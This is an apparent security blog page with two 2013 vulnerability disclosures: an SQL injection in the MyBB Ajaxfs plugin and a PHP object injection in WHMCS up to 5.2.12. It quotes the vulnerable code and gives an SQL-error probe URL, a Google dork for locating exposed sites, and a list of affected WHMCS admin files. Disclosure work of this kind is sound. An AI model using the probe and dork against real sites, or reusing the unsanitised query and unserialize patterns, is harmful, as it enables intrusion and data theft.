Mybb Ajaxfs Plugin Sql Injection vulnerability

Posted by Saadi On Tuesday 19 November 2013 4 comments
Welcome once again :D

Today i was just browsing 1337day.com and come across a exploit title as Mybb Ajaxfs Plugin Sql Injection which they selling it for 150$.
http://1337day.com/exploit/description/21541

So i just start to pentest the plugin and in  just two minutes i found the bug.
So here are the details

Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2

The plugin is vuln to tooltip and usertooltip parameter in ajaxfs.php

POC
code:


1  if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");



2 if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
http://localhost/Upload/ajaxfs.php?usertooltip=1'
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 
Google DORK : inurl:ajaxfs.php
#Independent Pakistani Security Researcher

READ MORE

WHMCS <=5.2.12 PHP Object Injection

Posted by Saadi On Saturday 2 November 2013 4 comments
Hi all , was alot busy with my work ,  so now here comes some new stuff PHP object injection in all whmcs versions.

http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717


# Exploit Title               : WHMCS <=5.2.12 PHP Object Injection
                                  :Web Host Manager Complete Solution
# Date                         : 2013/10/24
# Exploit Author          : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link          : http://www.whmcs.com
# Author HomePage   : http://security-geeks.blogspot.com
# Tested on: Server     : Apache/2.2.15 PHP/5.3.3

#PHP Object Injection

#Affected Versions:
WHMCS <=5.2.12

#Vulnerability Description
Poc

The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes S_COOKIE data to unserialize function without sanitizing it.
Code on Line 711

$sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
$sortdata = unserialize( base64_decode( $sortdata ) );

User input passed through the Cookies is not properly sanitized before being used in
an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the
application scope.

Some of the files which are calling sortableint() function are

/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php


#Independent Pakistani Security Researcher
READ MORE